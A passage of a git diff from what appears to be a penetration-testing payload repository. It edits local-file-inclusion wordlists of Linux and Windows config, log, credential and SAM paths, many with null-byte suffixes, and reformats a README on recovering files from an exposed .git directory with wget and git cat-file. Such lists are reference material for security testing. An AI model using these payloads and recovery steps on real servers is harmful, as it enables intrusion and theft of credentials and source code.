/etc/wu-ftpd/ftpusers%00 /home2\bin\stable\apache\php.ini -/home2\bin\stable\apache\php.ini +/home2\bin\stable\apache\php.ini /home2\bin\stable\apache\php.ini%00 /home\bin\stable\apache\php.ini -/home\bin\stable\apache\php.ini +/home\bin\stable\apache\php.ini /home\bin\stable\apache\php.ini%00 \log\access_log \log\access.log @@ -311,83 +311,83 @@ etc/passwd%00 \log\httpd\access_log \log\httpd\error_log /logs/access_log -/logs/access_log +/logs/access_log +/logs/access.log /logs/access.log -/logs/access.log \logs\access_log \logs\access.log /logs/access.log%00 /logs/error_log -/logs/error_log +/logs/error_log +/logs/error.log /logs/error.log -/logs/error.log \logs\error_log \logs\error.log /logs/error.log%00 \logs\httpd\access_log \logs\httpd\error_log /logs/pure-ftpd.log -/logs/pure-ftpd.log +/logs/pure-ftpd.log /logs/pure-ftpd.log%00 \mysql\bin\my.ini /NetServer\bin\stable\apache\php.ini -/NetServer\bin\stable\apache\php.ini +/NetServer\bin\stable\apache\php.ini /NetServer\bin\stable\apache\php.ini%00 /opt/apache2/conf/httpd.conf -/opt/apache2/conf/httpd.conf +/opt/apache2/conf/httpd.conf /opt/apache2/conf/httpd.conf%00 /opt/apache/conf/httpd.conf -/opt/apache/conf/httpd.conf +/opt/apache/conf/httpd.conf /opt/apache/conf/httpd.conf%00 /opt/lampp/logs/access_log -/opt/lampp/logs/access_log +/opt/lampp/logs/access_log +/opt/lampp/logs/access.log /opt/lampp/logs/access.log -/opt/lampp/logs/access.log /opt/lampp/logs/access_log%00 /opt/lampp/logs/access.log%00 /opt/lampp/logs/error_log -/opt/lampp/logs/error_log +/opt/lampp/logs/error_log +/opt/lampp/logs/error.log /opt/lampp/logs/error.log -/opt/lampp/logs/error.log /opt/lampp/logs/error_log%00 /opt/lampp/logs/error.log%00 /opt/xampp/etc/php.ini -/opt/xampp/etc/php.ini +/opt/xampp/etc/php.ini /opt/xampp/etc/php.ini%00 /opt/xampp/logs/access_log -/opt/xampp/logs/access_log +/opt/xampp/logs/access_log +/opt/xampp/logs/access.log /opt/xampp/logs/access.log -/opt/xampp/logs/access.log \opt\xampp\logs\access_log \opt\xampp\logs\access.log /opt/xampp/logs/access_log%00 /opt/xampp/logs/access.log%00 /opt/xampp/logs/error_log -/opt/xampp/logs/error_log +/opt/xampp/logs/error_log +/opt/xampp/logs/error.log /opt/xampp/logs/error.log -/opt/xampp/logs/error.log \opt\xampp\logs\error_log \opt\xampp\logs\error.log /opt/xampp/logs/error_log%00 /opt/xampp/logs/error.log%00 /php4\php.ini -/php4\php.ini +/php4\php.ini /php4\php.ini%00 /php5\php.ini -/php5\php.ini +/php5\php.ini /php5\php.ini%00 php://input /php\php.ini -/php\php.ini +/php\php.ini +/PHP\php.ini /PHP\php.ini -/PHP\php.ini /php\php.ini%00 /PHP\php.ini%00 /private/etc/httpd/httpd.conf -/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf /private/etc/httpd/httpd.conf%00 /private/etc/httpd/httpd.conf.default -/private/etc/httpd/httpd.conf.default +/private/etc/httpd/httpd.conf.default /private/etc/httpd/httpd.conf.default%00 /proc/cmdline /proc/self/cmdline @@ -433,198 +433,198 @@ php://input /proc/self/status /proc/version /Program Files\Apache Group\Apache2\conf\httpd.conf -/Program Files\Apache Group\Apache2\conf\httpd.conf +/Program Files\Apache Group\Apache2\conf\httpd.conf \Program Files\Apache Group\Apache2\conf\httpd.conf /Program Files\Apache Group\Apache2\conf\httpd.conf%00 /Program Files\Apache Group\Apache\conf\httpd.conf -/Program Files\Apache Group\Apache\conf\httpd.conf +/Program Files\Apache Group\Apache\conf\httpd.conf \Program Files\Apache Group\Apache\conf\httpd.conf /Program Files\Apache Group\Apache\conf\httpd.conf%00 /Program Files\Apache Group\Apache\logs\access.log -/Program Files\Apache Group\Apache\logs\access.log +/Program Files\Apache Group\Apache\logs\access.log \Program Files\Apache Group\Apache\logs\access.log /Program Files\Apache Group\Apache\logs\access.log%00 /Program Files\Apache Group\Apache\logs\error.log -/Program Files\Apache Group\Apache\logs\error.log +/Program Files\Apache Group\Apache\logs\error.log \Program Files\Apache Group\Apache\logs\error.log /Program Files\Apache Group\Apache\logs\error.log%00 /Program Files\xampp\apache\conf\httpd.conf -/Program Files\xampp\apache\conf\httpd.conf +/Program Files\xampp\apache\conf\httpd.conf /Program Files\xampp\apache\conf\httpd.conf%00 \Program Files\xampp\apache\conf\httpd.confetc/passwd /root/.bash_history /tmp/sess_ /usr/apache2/conf/httpd.conf -/usr/apache2/conf/httpd.conf +/usr/apache2/conf/httpd.conf /usr/apache2/conf/httpd.conf%00 /usr/apache/conf/httpd.conf -/usr/apache/conf/httpd.conf +/usr/apache/conf/httpd.conf /usr/apache/conf/httpd.conf%00 /usr/etc/pure-ftpd.conf -/usr/etc/pure-ftpd.conf +/usr/etc/pure-ftpd.conf /usr/etc/pure-ftpd.conf%00 /usr/lib/php.ini -/usr/lib/php.ini +/usr/lib/php.ini /usr/lib/php.ini%00 /usr/lib/php/php.ini -/usr/lib/php/php.ini +/usr/lib/php/php.ini /usr/lib/php/php.ini%00 /usr/lib/security/mkuser.default -/usr/lib/security/mkuser.default +/usr/lib/security/mkuser.default /usr/lib/security/mkuser.default%00 /usr/local/apache2/conf/httpd.conf -/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/conf/httpd.conf /usr/local/apache2/conf/httpd.conf%00 /usr/local/apache2/httpd.conf -/usr/local/apache2/httpd.conf +/usr/local/apache2/httpd.conf /usr/local/apache2/httpd.conf%00 /usr/local/apache2/logs/access_log -/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/access.log /usr/local/apache2/logs/access.log -/usr/local/apache2/logs/access.log /usr/local/apache2/logs/access_log%00 /usr/local/apache2/logs/access.log%00 /usr/local/apache2/logs/error_log -/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.log /usr/local/apache2/logs/error.log -/usr/local/apache2/logs/error.log /usr/local/apache2/logs/error_log%00 /usr/local/apache2/logs/error.log%00 /usr/local/apache/conf/httpd.conf -/usr/local/apache/conf/httpd.conf +/usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf%00 /usr/local/apache/conf/php.ini -/usr/local/apache/conf/php.ini +/usr/local/apache/conf/php.ini /usr/local/apache/conf/php.ini%00 /usr/local/apache/httpd.conf -/usr/local/apache/httpd.conf +/usr/local/apache/httpd.conf /usr/local/apache/httpd.conf%00 /usr/local/apache/logs/access_log /usr/local/apache/logs/access_log -/usr/local/apache/logs/access_log +/usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /usr/local/apache/logs/access.log -/usr/local/apache/logs/access.log +/usr/local/apache/logs/access.log /usr/local/apache/logs/access_ log%00 /usr/local/apache/logs/access_log%00 /usr/local/apache/logs/access. log%00 /usr/local/apache/logs/access.log%00 /usr/local/apache/logs/error_log /usr/local/apache/logs/error_log -/usr/local/apache/logs/error_log +/usr/local/apache/logs/error_log /usr/local/apache/logs/error.log /usr/local/apache/logs/error.log -/usr/local/apache/logs/error.log +/usr/local/apache/logs/error.log /usr/local/apache/logs/error_log%00 /usr/local/apache/logs/error.log%00 /usr/local/apps/apache2/conf/httpd.conf -/usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache2/conf/httpd.conf /usr/local/apps/apache2/conf/httpd.conf%00 /usr/local/apps/apache/conf/httpd.conf -/usr/local/apps/apache/conf/httpd.conf +/usr/local/apps/apache/conf/httpd.conf /usr/local/apps/apache/conf/httpd.conf%00 /usr/local/cpanel/logs -/usr/local/cpanel/logs +/usr/local/cpanel/logs /usr/local/cpanel/logs%00 /usr/local/cpanel/logs/access_log -/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/access_log%00 /usr/local/cpanel/logs/error_log -/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/error_log%00 /usr/local/cpanel/logs/license_log -/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/license_log%00 /usr/local/cpanel/logs/login_log -/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/login_log%00 /usr/local/cpanel/logs/stats_log -/usr/local/cpanel/logs/stats_log +/usr/local/cpanel/logs/stats_log /usr/local/cpanel/logs/stats_log%00 /usr/local/etc/apache2/conf/httpd.conf -/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/apache2/conf/httpd.conf /usr/local/etc/apache2/conf/httpd.conf%00 /usr/local/etc/apache/conf/httpd.conf -/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf /usr/local/etc/apache/conf/httpd.conf%00 /usr/local/etc/apache/vhosts.conf -/usr/local/etc/apache/vhosts.conf +/usr/local/etc/apache/vhosts.conf /usr/local/etc/apache/vhosts.conf%00 /usr/local/etc/httpd/conf/httpd.conf -/usr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/httpd/conf/httpd.conf /usr/local/etc/httpd/conf/httpd.conf%00 /usr/local/etc/php.ini -/usr/local/etc/php.ini +/usr/local/etc/php.ini /usr/local/etc/php.ini%00 /usr/local/etc/pure-ftpd.conf -/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pure-ftpd.conf /usr/local/etc/pure-ftpd.conf%00 /usr/local/etc/pureftpd.pdb -/usr/local/etc/pureftpd.pdb +/usr/local/etc/pureftpd.pdb /usr/local/etc/pureftpd.pdb%00 /usr/local/httpd/conf/httpd.conf -/usr/local/httpd/conf/httpd.conf +/usr/local/httpd/conf/httpd.conf /usr/local/httpd/conf/httpd.conf%00 /usr/local/lib/php.ini -/usr/local/lib/php.ini +/usr/local/lib/php.ini /usr/local/lib/php.ini%00 /usr/local/php4/httpd.conf -/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf /usr/local/php4/httpd.conf%00 /usr/local/php4/httpd.conf.php -/usr/local/php4/httpd.conf.php +/usr/local/php4/httpd.conf.php /usr/local/php4/httpd.conf.php%00 /usr/local/php4/lib/php.ini -/usr/local/php4/lib/php.ini +/usr/local/php4/lib/php.ini /usr/local/php4/lib/php.ini%00 /usr/local/php5/httpd.conf -/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf /usr/local/php5/httpd.conf%00 /usr/local/php5/httpd.conf.php -/usr/local/php5/httpd.conf.php +/usr/local/php5/httpd.conf.php /usr/local/php5/httpd.conf.php%00 /usr/local/php5/lib/php.ini -/usr/local/php5/lib/php.ini +/usr/local/php5/lib/php.ini /usr/local/php5/lib/php.ini%00 /usr/local/php/httpd.conf -/usr/local/php/httpd.conf +/usr/local/php/httpd.conf /usr/local/php/httpd.conf%00 /usr/local/php/httpd.conf.php -/usr/local/php/httpd.conf.php +/usr/local/php/httpd.conf.php /usr/local/php/httpd.conf.php%00 /usr/local/php/lib/php.ini -/usr/local/php/lib/php.ini +/usr/local/php/lib/php.ini /usr/local/php/lib/php.ini%00 /usr/local/pureftpd/etc/pure-ftpd.conf -/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pure-ftpd.conf /usr/local/pureftpd/etc/pure-ftpd.conf%00 /usr/local/pureftpd/etc/pureftpd.pdb -/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/etc/pureftpd.pdb /usr/local/pureftpd/etc/pureftpd.pdb%00 /usr/local/pureftpd/sbin/pure-config.pl -/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/pureftpd/sbin/pure-config.pl /usr/local/pureftpd/sbin/pure-config.pl%00 /usr/local/Zend/etc/php.ini -/usr/local/Zend/etc/php.ini +/usr/local/Zend/etc/php.ini /usr/local/Zend/etc/php.ini%00 /usr/pkgsrc/net/pureftpd/ -/usr/pkgsrc/net/pureftpd/ +/usr/pkgsrc/net/pureftpd/ /usr/pkgsrc/net/pureftpd/%00 /usr/ports/contrib/pure-ftpd/ -/usr/ports/contrib/pure-ftpd/ +/usr/ports/contrib/pure-ftpd/ /usr/ports/contrib/pure-ftpd/%00 /usr/ports/ftp/pure-ftpd/ -/usr/ports/ftp/pure-ftpd/ +/usr/ports/ftp/pure-ftpd/ /usr/ports/ftp/pure-ftpd/%00 /usr/ports/net/pure-ftpd/ -/usr/ports/net/pure-ftpd/ +/usr/ports/net/pure-ftpd/ /usr/ports/net/pure-ftpd/%00 /usr/sbin/pure-config.pl -/usr/sbin/pure-config.pl +/usr/sbin/pure-config.pl /usr/sbin/pure-config.pl%00 /var/adm/lastlog /var/adm/log/xferlog -/var/adm/log/xferlog +/var/adm/log/xferlog /var/adm/log/xferlog%00 /var/adm/messages /var/adm/messages.0 @@ -634,28 +634,28 @@ php://input /var/adm/utmpx /var/adm/wtmpx /var/cpanel/cpanel.config -/var/cpanel/cpanel.config +/var/cpanel/cpanel.config /var/cpanel/cpanel.config%00 /var/db/shadow/hash /var/lib/mysql/my.cnf -/var/lib/mysql/my.cnf +/var/lib/mysql/my.cnf /var/lib/mysql/my.cnf%00 /var/lib/php5/session/sess_ /var/lib/php/session/sess_ /var/local/www/conf/php.ini -/var/local/www/conf/php.ini +/var/local/www/conf/php.ini /var/local/www/conf/php.ini%00 /var/log/access_log /var/log/access_log -/var/log/access_log +/var/log/access_log /var/log/access.log /var/log/access.log -/var/log/access.log +/var/log/access.log /var/log/access_log%00 /var/log/access.log%00 /var/log/apache2/access_log /var/log/apache2/access_log -/var/log/apache2/access_log +/var/log/apache2/access_log /var/log/apache2/access.log /var/log/apache2/access.log /var/log/apache2/access_log%00 @@ -664,12 +664,12 @@ php://input /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache2/error.log -/var/log/apache2/error.log +/var/log/apache2/error.log /var/log/apache2/error_log%00 /var/log/apache2/error.log%00 /var/log/apache/access_log /var/log/apache/access_log -/var/log/apache/access_log +/var/log/apache/access_log /var/log/apache/access.log /var/log/apache/access.log /var/log/apache/access_log%00 @@ -678,7 +678,7 @@ php://input /var/log/apache/error_log /var/log/apache/error.log /var/log/apache/error.log -/var/log/apache/error.log +/var/log/apache/error.log /var/log/apache/error_log%00 /var/log/apache/error.log%00 /var/log/authlog @@ -698,39 +698,39 @@ php://input /var/log/error_log%00 /var/log/error.log%00 /var/log/exim_mainlog -/var/log/exim_mainlog +/var/log/exim_mainlog +/var/log/exim/mainlog /var/log/exim/mainlog -/var/log/exim/mainlog /var/log/exim_mainlog%00 /var/log/exim/mainlog%00 /var/log/exim_paniclog -/var/log/exim_paniclog +/var/log/exim_paniclog +/var/log/exim/paniclog /var/log/exim/paniclog -/var/log/exim/paniclog /var/log/exim_paniclog%00 /var/log/exim/paniclog%00 /var/log/exim_rejectlog /var/log/exim/rejectlog -/var/log/exim/rejectlog +/var/log/exim/rejectlog /var/log/exim/rejectlog%00 /var/log/exim_rejectlog%00/etc/issue /var/log/exim_rejectlog/etc/passwd /var/log/ftplog -/var/log/ftplog +/var/log/ftplog /var/log/ftplog%00 /var/log/ftp-proxy -/var/log/ftp-proxy +/var/log/ftp-proxy /var/log/ftp-proxy%00 /var/log/ftp-proxy/ftp-proxy.log -/var/log/ftp-proxy/ftp-proxy.log +/var/log/ftp-proxy/ftp-proxy.log /var/log/ftp-proxy/ftp-proxy.log%00 /var/log/httpd/access_log -/var/log/httpd/access_log +/var/log/httpd/access_log /var/log/httpd/access.log /var/log/httpd/access_log%00 /var/log/httpd/access.log%00 /var/log/httpd/error_log -/var/log/httpd/error_log +/var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpd/error_log%00 /var/log/httpd/error.log%00 @@ -738,7 +738,7 @@ php://input /var/log/lastlog /var/log/maillog /var/log/mail.log -/var/log/maillog +/var/log/maillog /var/log/maillog%00 /var/log/messages /var/log/messages.0 @@ -751,23 +751,23 @@ php://input /var/log/messages.3.gz /var/log/messages.log /var/log/mysqlderror.log -/var/log/mysqlderror.log +/var/log/mysqlderror.log /var/log/mysqlderror.log%00 /var/log/mysql.log -/var/log/mysql.log +/var/log/mysql.log /var/log/mysql.log%00 /var/log/mysql/mysql-bin.log -/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql-bin.log /var/log/mysql/mysql-bin.log%00 /var/log/mysql/mysql.log -/var/log/mysql/mysql.log +/var/log/mysql/mysql.log /var/log/mysql/mysql.log%00 /var/log/mysql/mysql-slow.log -/var/log/mysql/mysql-slow.log +/var/log/mysql/mysql-slow.log /var/log/mysql/mysql-slow.log%00 /var/log/nginx/access_log /var/log/nginx/access_log -/var/log/nginx/access_log +/var/log/nginx/access_log /var/log/nginx/access.log /var/log/nginx/access.log /var/log/nginx/access_log%00 @@ -776,17 +776,17 @@ php://input /var/log/nginx/error_log /var/log/nginx/error.log /var/log/nginx/error.log -/var/log/nginx/error.log +/var/log/nginx/error.log /var/log/nginx/error_log%00 /var/log/nginx/error.log%00 /var/log/proftpd -/var/log/proftpd +/var/log/proftpd /var/log/proftpd%00 /var/log/pureftpd.log -/var/log/pureftpd.log +/var/log/pureftpd.log /var/log/pureftpd.log%00 /var/log/pure-ftpd/pure-ftpd.log -/var/log/pure-ftpd/pure-ftpd.log +/var/log/pure-ftpd/pure-ftpd.log /var/log/pure-ftpd/pure-ftpd.log%00 /var/log/secure.log /var/log/syslog @@ -800,40 +800,40 @@ php://input /var/log/syslog.3.gz /var/log/syslog.log /var/log/vsftpd.log -/var/log/vsftpd.log +/var/log/vsftpd.log /var/log/vsftpd.log%00 /var/log/wtmp /var/log/xferlog -/var/log/xferlog +/var/log/xferlog /var/log/xferlog%00 /var/mail/apache /var/mail/nobody /var/mail/www /var/mail/www-data /var/mysql.log -/var/mysql.log +/var/mysql.log /var/mysql.log%00 /var/root/.bash_history /var/root/.sh_history /var/run/utmp /var/www/.bash_history /var/www/conf/httpd.conf -/var/www/conf/httpd.conf +/var/www/conf/httpd.conf /var/www/conf/httpd.conf%00 /var/www/config.php /var/www/logs/access_log /var/www/logs/access_log -/var/www/logs/access_log +/var/www/logs/access_log /var/www/logs/access.log /var/www/logs/access.log /var/www/logs/access_log%00 /var/www/logs/access.log%00 /var/www/logs/error_log /var/www/logs/error_log -/var/www/logs/error_log +/var/www/logs/error_log /var/www/logs/error.log /var/www/logs/error.log -/var/www/logs/error.log +/var/www/logs/error.log /var/www/logs/error_log%00 /var/www/logs/error.log%00 /var/www/mgr/logs/access_log @@ -841,49 +841,49 @@ php://input /var/www/mgr/logs/error_log /var/www/mgr/logs/error.log /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00 /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00 /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00 /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00 /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00 /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00 /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini -/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00 /Volumes/webBackup/opt/apache2/conf/httpd.conf -/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/opt/apache2/conf/httpd.conf /Volumes/webBackup/opt/apache2/conf/httpd.conf%00 /Volumes/webBackup/private/etc/httpd/httpd.conf -/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf /Volumes/webBackup/private/etc/httpd/httpd.conf%00 /Volumes/webBackup/private/etc/httpd/httpd.conf.default -/Volumes/webBackup/private/etc/httpd/httpd.conf.default +/Volumes/webBackup/private/etc/httpd/httpd.conf.default /Volumes/webBackup/private/etc/httpd/httpd.conf.default%00 /web/conf/php.ini -/web/conf/php.ini +/web/conf/php.ini /web/conf/php.ini%00 /WINDOWS\php.ini -/WINDOWS\php.ini +/WINDOWS\php.ini /WINDOWS\php.ini%00 /WINNT\php.ini -/WINNT\php.ini +/WINNT\php.ini /WINNT\php.ini%00 /www/logs/proftpd.system.log -/www/logs/proftpd.system.log +/www/logs/proftpd.system.log /www/logs/proftpd.system.log%00 /xampp\apache\bin\php.ini -/xampp\apache\bin\php.ini +/xampp\apache\bin\php.ini /xampp\apache\bin\php.ini%00 \xampp\apache\conf\httpd.conf \xampp\apache\logs\access.log diff --git a/File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt b/File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt index 3ac0b98..4f764a8 100644 --- a/File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt +++ b/File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt @@ -14,7 +14,7 @@ /apache/logs/error.log%00 /apache/logs/access.log%00 /etc/httpd/logs/acces_log%00 -/etc/httpd/logs/access.log%00 +/etc/httpd/logs/acces.log%00 /etc/httpd/logs/error_log%00 /etc/httpd/logs/error.log%00 /var/www/logs/access_log%00 @@ -76,7 +76,7 @@ /logs/error.log%00 /logs/access.log%00 /etc/httpd/logs/acces_log%00 -/etc/httpd/logs/access.log%00 +/etc/httpd/logs/acces.log%00 /etc/httpd/logs/error_log%00 /etc/httpd/logs/error.log%00 /usr/local/apache/logs/access_log%00 @@ -142,7 +142,7 @@ /logs/error.log%00 /logs/access.log%00 /etc/httpd/logs/acces_log%00 -/etc/httpd/logs/access.log%00 +/etc/httpd/logs/acces.log%00 /etc/httpd/logs/error_log%00 /etc/httpd/logs/error.log%00 /var/www/logs/access_log%00 diff --git a/File Inclusion/Intruders/Windows-files.txt b/File Inclusion/Intruders/Windows-files.txt index 4717bf0..63386f7 100644 --- a/File Inclusion/Intruders/Windows-files.txt +++ b/File Inclusion/Intruders/Windows-files.txt @@ -146,7 +146,7 @@ C:/windows/repair/security C:/windows/repair/software C:/windows/repair/system C:/windows/system32/config/appevent.evt -C:/windows/system32/config/default.save +C:/windows/system32/config/default.sav C:/windows/system32/config/regback/default C:/windows/system32/config/regback/sam C:/windows/system32/config/regback/security @@ -154,11 +154,11 @@ C:/windows/system32/config/regback/software C:/windows/system32/config/regback/system C:/windows/system32/config/sam C:/windows/system32/config/secevent.evt -C:/windows/system32/config/security.save -C:/windows/system32/config/software.save +C:/windows/system32/config/security.sav +C:/windows/system32/config/software.sav C:/windows/system32/config/system C:/windows/system32/config/system.sa -C:/windows/system32/config/system.save +C:/windows/system32/config/system.sav C:/windows/system32/drivers/etc/hosts C:/windows/system32/eula.txt C:/windows/system32/inetsrv/config/applicationhost.config diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md index 8683826..8e97fb7 100644 --- a/Insecure Source Code Management/README.md +++ b/Insecure Source Code Management/README.md @@ -1,34 +1,34 @@ # Insecure Source Code Management -* [Git](#git) - + [Example](#example) +- [Git](#git) + - [Example](#example) - [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead) - [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex) - + [Tools](#tools) + - [Tools](#tools) - [Automatic recovery](#automatic-recovery) - * [git-dumper.py](#git-dumperpy) - * [digit.py](#diggitpy) - * [GoGitDumper](#gogitdumper) - * [rip-git](#rip-git) - * [GitHack](#githack) - * [GitTools](#gittools) + - [git-dumper.py](#git-dumperpy) + - [diggit.py](#diggitpy) + - [GoGitDumper](#gogitdumper) + - [rip-git](#rip-git) + - [GitHack](#githack) + - [GitTools](#gittools) - [Harvesting secrets](#harvesting-secrets) - * [trufflehog](#trufflehog) - * [Yar](#yar) - * [Gitrob](#gitrob) - * [Gitleaks](#gitleaks) -* [Subversion](#subversion) - + [Example (Wordpress)](#example-wordpress) - + [Tools](#tools-1) + - [trufflehog](#trufflehog) + - [Yar](#yar) + - [Gitrob](#gitrob) + - [Gitleaks](#gitleaks) +- [Subversion](#subversion) + - [Example (Wordpress)](#example-wordpress) + - [Tools](#tools-1) - [svn-extractor](#svn-extractor) -* [Bazaar](#bazaar) - + [Tools](#tools-2) +- [Bazaar](#bazaar) + - [Tools](#tools-2) - [rip-bzr.pl](#rip-bzrpl) - [bzr_dumper](#bzr_dumper) -* [Mercurial](#mercurial) - + [Tools](#tools-3) +- [Mercurial](#mercurial) + - [Tools](#tools-3) - [rip-hg.pl](#rip-hgpl) -* [References](#references) +- [References](#references) ## Git @@ -46,53 +46,57 @@ Check for the following files, if they exist you can extract the .git folder. 1. Check for 403 Forbidden or directory listing to find the `/.git/` directory 2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too) - ```powershell - 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git - 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael 1489390329 +0000 commit: Initial. - 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael 1489390330 +0000 commit: Whoops! Remove flag. - 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael 1489390332 +0000 commit: Prevent directory listing. - ``` + ```powershell + 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git + 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael 1489390329 +0000 commit: Initial. + 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael 1489390330 +0000 commit: Whoops! Remove flag. + 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael 1489390332 +0000 commit: Prevent directory listing. + ``` 3. Access the commit using the hash - ```powershell - # create an empty .git repository - git init test - cd test/.git - # download the file - wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c + ```powershell + # create an empty .git repository + git init test + cd test/.git - # first byte for subdirectory, remaining bytes for filename - mkdir .git/object/26 - mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/ + # download the file + wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c + + # first byte for subdirectory, remaining bytes for filename + mkdir .git/object/26 + mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/ + + # display the file + git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c + tree 323240a3983045cdc0dec2e88c1358e7998f2e39 + parent 15ca375e54f056a576905b41a417b413c57df6eb + author Michael 1489390329 +0000 + committer Michael 1489390329 +0000 + Initial. + ``` - # display the file - git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c - tree 323240a3983045cdc0dec2e88c1358e7998f2e39 - parent 15ca375e54f056a576905b41a417b413c57df6eb - author Michael 1489390329 +0000 - committer Michael 1489390329 +0000 - Initial. - ``` 4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 - ```powershell - wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 - mkdir .git/object/32 - mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ - git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 - 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css - 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt - 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts - 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html - 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js - ``` + ```powershell + wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 + mkdir .git/object/32 + mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ + + git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 + 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css + 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt + 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts + 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html + 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js + ``` + 5. Read the data (flag.txt) - ```powershell - wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f - mkdir .git/object/cb - mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/ - git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f - ``` + 